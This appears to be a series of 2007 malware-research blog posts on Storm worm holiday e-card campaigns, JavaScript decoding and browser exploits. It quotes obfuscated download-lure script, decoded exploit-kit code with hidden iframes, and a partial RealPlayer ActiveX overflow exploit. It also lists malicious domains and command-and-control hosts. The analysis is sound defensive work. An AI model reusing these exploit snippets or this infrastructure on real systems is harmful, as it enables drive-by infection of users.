New Year, Recycled Greeting Cards

The storm authors have made up for their lack of creativity by registering a bunch of domains and quickly changing the filename. Additionally a false name has been added as a comment to the html source:

Your download should begin shortly. If your download does not start in
approximately 15 seconds,<br>
you can <!-- a href="fck2008.exe" !--><script language="javascript">
<!-- a href="fck2009.exe" -->
document.write( unescape(
'%3C%61%20%68%72%65%66%3D%22%68%61%70%70%79%6E%65%77%79%65%61%72%32%30%30%38%2E%65%78%65%22%3E'
) );

The javascript actually reads:

<a href="happynewyear2008.exe">

This was probably done in an attempt to identify automated scripts that parse the page for links, then crawl those links.

The following domains are still active (the other domains registered through ESTDOMAINS were suspended December 28th):

newyearcards2008.com
happycards2008.com
uhavepostcard.com
merrychristmasdude.com
newyearwithlove.com
familypostcards2008.com
freshcards2008.com
hellosanta2008.com
happy2008toyou.com
happysantacards.com
hohoho2008.com

serving the following files:

happynewyear2008.exe
happy_2008.exe
sony.exe

Bleeding Edge threats mirror

For the last few days Bleeding Edge Threats (Sensory Networks) has had issues with their DNS and servers. Matt Jonkman let us know that his new home, Emerging Threats, will also act as a mirror for the Bleeding Edge rules. An entry on the Emerging Threats website states:

In light of the unavailability of the Bleeding Edge Rulesets we're mirroring them over here. Will be adding a number of rules as well in the next few days. Rules will be available at the same url pattern, just use the domain emergingthreats.net. View directly here: http://www.emergingthreats.net/rules/

The primary site Bleedingthreats.com has been plauged by DNS instability and site outages. It's currently been down for days with no response from it's maintainers. Not an acceptable situation for a realtime ruleset.

We will be pushing updates to the rulesets from here, and setting up a backend to manage these rules and the new rules we'll be adding. Please feel free to send rules here or to the bleeding edge folks.

As you can see we're just getting this site online. We haven't even picked up a logo yet, or a permanent color scheme. If you want to contribute a logo, please do! All of the current efforts are going into an intelligence gathering and rule generating backend. Great progress has been made, a very interesting data stream is coming online very soon!

Our intention is not to split the ruleset, maintaining these rules is not an easy task nor does it produce revenue. We'd be just as happy had they been maintained in their original home at Bleeding Threats and the research beginning here could have contributed into that ruleset. But that's unfortunately not happening, so we'll keep them here. Bleeding Threats will likely continue to maintain a ruleset, you should stick to one set or the other.

Please send any questions to myself directly at This e-mail address is being protected from spam bots, you need JavaScript enabled to view it We'll be putting up some mailing lists to hop onto shortly. You can track the news and developments via the RSS feeds available on the site left bar. Administrators will be available in the Freenode IRC room #emergingthreats, and soon in an open Jabber room.

Bah, Storm.

I'd like to thank everyone who wrote in with the updates, CME711 is now using a Happy New Year theme. I would have posted earlier, but I promised the family a full day of Non-Digital happiness and it was truly a white Christmas.

Nothing sexy about this latest run, pretty crappy workmanship. It was an obvious after thought. It probably pissed off the botrunner that so many people were able to catch on to his Naughty Santa theme, so he produced a text only front page:

Happy New Year!

Your download should begin shortly. If your download does not start in approximately 15 seconds, you can (happy2008.exe) click here to launch the download and then press Run. Enjoy!

Hardly worth a post, except to exclaim how pathetic it looks. Certainly not the experience we've seen from these guys in exploits past. The domain was even registered December 23rd, such poor planning. Not an encoded javascript in sight. I wonder how much money these guys are paying their graphic designers. Certainly more than they're making. Even second rate script rats should think twice before getting in bed with these goons - they're too famous.

So, the domain? uhavepostcard.com. (also happycards2008.com)
Are the others still resolving? Yup.
Which binaries still work? stripshow.exe sony.exe happy2008.exe (update: happy-2008.exe)
Should the offenders be strung up by their toes and fed spoiled eggnog for 30 days? ;)

I sincerely hope that everyone else had a wonderful holiday, and for my New Years wish, I'd like a picture of the CME711 weenies drinking well expired eggnog. I'd also settle for another wonderful day with the family, as it was today.

Stormworm is back. - Have a Merry Christmas Dude, Mrs. Claus is kinky!

We just received a handful of these in our mail drops. Looks like the grinch still runs storm.

Received: from odv ([129.65.118.202])
by dxmbg (8.13.4/8.13.4) with SMTP id lBO3q3Xg061735;
Sun, 23 Dec 2007 19:52:03 -0800
Message-ID: <002601c845e0$2b459370$ca764181@odv>
From: jyothi@acc.aon.com
To: Nicholas
Subject: Santa Said, HO HO HO
Date: Sun, 23 Dec 2007 19:50:48 -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

hey,

I know you hate these kind of emails but this one is different. This
will be the best 2 min you spend this holiday. hehe
http:// merry christmas dude . com/

Which plays a happy little Christmas tune, offers stripshow.exe and visits this Neosploit:
http:// merrychristmasdude .com/ cgi-bin/ in.cgi?p=100

In place of MerryChristmasDude you could use ltbrew, tibeam, etc.

JSDecode (See previous post) has no issues with this javascript, and cleans it up to show:

var script = document.createElement("script");

script.setAttribute("language", "JavaScript");
script.setAttribute("src", "?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i");

document.body.appendChild(script);

So we look at cgi-bin/in.cgi?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i...

It took two passes, but JSDecode did its job:

....snip...

function startANI()
var ifr = document.createElement("div");
document.body.appendChild(ifr);
ifr.innerHTML = 'iframe src="?o2&p=595022058&r=2792316769" height="1" width="1"'
      return 0;
}

if (startMDAC() || makeSlide() || startQuickTime() || startSuperBuddy() || startAudioFile() || startGOM() || startWVF() || startANI()) { }
setTimeout("window.location = 'http://www.google.com'", 5000);

...snip...

The ANI looks fun:

From:
Subject:
Date: Thu, 20 Dec 2007 08:57:57 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0005_01C842E6.6AA3A540"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://testtest/index.html

------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Location: http://testtest/1.dat
....
[BASE64 ENCODED FILE - infected: Exploit.Win32.MS05-002.Gen]

Once ran in the Sandbox, %windir%/disnisa.exe is the binary and %windir%/disnisa.config holds the peer list.

Same old storm, binary changes every few seconds, and someone's going to fall for it.

Complete binary analysis can be found at ASERT (Arbor Networks, Jose Nazario)

The silent Storm and Javascript Decoding

Its been awhile since I've posted anything. I haven't lost touch, I've just been busy with the upcoming Holiday, and reserving myself for the next big Storm update.

A few of us were talking about Storm the other day, and Paul suggested that perhaps the authors have simply abandoned the current Storm botnet, in favor of laying low for a few months, and releasing a whole new version of the code, one with less bugs and some tactical modifications that might make it harder for security researchers to track them. I'm beginning to wonder if he's right. Storm has been silent since mid November. Is a New Year virus going to be born, something far more intrusive than Storm? Only time will tell. Thankfully we're getting a much needed break, so we can focus on other botnets.

---

There have been a good number of emails coming from users who wonder how we're able to decode some of the JavaScript seen on malware sites. The question usually comes after a reader has spotted a dangerous looking page, and we've confirmed it.

Daniel Wesemann has a great write up here. In fact Daniel sparked my interest in decoding malicious javascript instead of just running it through Rhino.

He and Jose Nazario with Arbor Networks have been great mentors. I thought I'd share something I put together using the skills taught by these two fellows.

I've built an automatic Javascript Decoder, which you can freely download and use. It is coded with an eye towards the unix flavor of OS, but should work fine if you have SpiderMonkey installed for windows, and don't mind modifying the code slightly. Jsdecode a public domain script that is simply a wrapper for Mozilla's SpiderMonkey application. Therefore, SpiderMonkey must be installed before this script will work.

Most of the malicious Javascript can be decoded by simply running it through this script. So far I've only had a handful of malicious javascripts requiring more advanced thought. The script isn't magic. It just creates a document.write function for you, and modifies eval statements so they print to the screen, and reruns the decoded javascript to make sure its just not double encoded. Other security researchers have written much better products, for example Malzilla from Boban Spasic.

This script just solves the "quick and dirty" requests I get on an almost daily basis. As is the case with any of my scripts, you're welcome to share them, modify them, even call them your own - but please give credit where credit is due, specifically to Jose and Daniel. If you use the script, or its techniques, consider dropping them a line and thanking them for helping educate the rest of us.

Happy Holidays,

Nicholas

jsdecode.pl.txt (rename to jsdecode.pl)

Sandboxing and CSA Advisory

I spent a few hours playing with my sandbox tonight, and found these C&C's:

x.fuckunion.com (GET /adswin//adsupdate.asp?ver=2007010300 HTTP/1.1)

http://208.72.169.22:4099 (GET /g/A39F4B-796773-3A00DD HTTP/1.1)

traff.justcount.net GET /t/d2hsdWF3OzJ0OHY5Oj0................cKEwkcVA8KCwEL/count.htm HTTP/1.1

208.72.169.55 (POST /login.php HTTP/1.0)

s2.truth-is-out-there.org (GET /?name= HTTP/1.1) -> f6.thezirius.com (GET /?feed=1&name= HTTP/1.1)

barragames1.sslpowered.com (POST /jogador/infe.php HTTP/1.0)

www.samedi.org (POST /syls/SAICOX.cgi HTTP/1.1)

IRC: Undernet.org:6665, Chan: #sefutemata69 Chankey: disc

----

Earlier this afternoon Cisco released an advisory about their Security Agent (CSA). At this time there is no public exploit, however I am sure that will change over the next few days.

It appears that CSA is vulnerable to specially crafted overflows on the SMB ports (139/445). The advisories reference BSOD's and possible code execution. Its never good when a security application comes up on the CVE list. Be sure you update your CSA as soon as possible.

QuickTime and RealPlayer Exploits

We're seeing lots of reports about Quicktime and RealPlayer exploits in the wild. Other security vendors are privately reporting an excess of 300 sites infected with these exploits. Most of them are iframes pointing to encoded Javascript. Of course users may never even know they've been infected.

Here is a partial snip of one exploit in human readable form:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");

.....
(removed some content)
.....

PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "copyleft";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

Many people forget to upgrade the their third party applications. Please remember to apply all security patches for those as frequently (or more so) than Windows updates.
In other news,

Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.

A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.

Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...

Happy Holidays!